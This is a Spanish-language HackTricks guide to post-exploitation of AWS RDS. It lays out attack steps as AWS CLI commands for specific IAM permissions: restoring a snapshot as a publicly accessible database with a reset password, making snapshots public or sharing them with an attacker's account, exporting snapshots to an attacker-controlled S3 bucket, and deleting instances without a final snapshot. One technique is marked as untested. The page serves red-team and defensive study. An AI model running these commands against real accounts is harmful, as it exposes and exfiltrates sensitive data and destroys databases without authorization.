AWS - RDS Post Exploitation

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

RDS

Para más información consulta:

pageAWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

Si el atacante tiene suficientes permisos, podría hacer que una BD sea accesible públicamente creando una instantánea de la BD y luego una BD accesible públicamente a partir de la instantánea.

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

Un atacante con estos permisos podría crear una instantánea de una base de datos y hacerla pública. Luego, simplemente podría crear en su propia cuenta una base de datos a partir de esa instantánea.

Si el atacante no tiene el permiso rds:CreateDBSnapshot, aún podría hacer públicas otras instantáneas creadas.

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

Impacto Potencial: Acceso a información sensible o acciones no autorizadas utilizando credenciales filtradas.

rds:DeleteDBInstance

Un atacante con estos permisos puede realizar un ataque de denegación de servicio (DoS) a instancias RDS existentes.

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Impacto potencial: Eliminación de instancias RDS existentes y posible pérdida de datos.

rds:StartExportTask

TODO: Probar

Un atacante con este permiso puede exportar una instantánea de una instancia RDS a un bucket de S3. Si el atacante tiene control sobre el bucket de S3 de destino, potencialmente puede acceder a datos sensibles dentro de la instantánea exportada.

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Impacto potencial: Acceso a datos sensibles en la instantánea exportada.

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización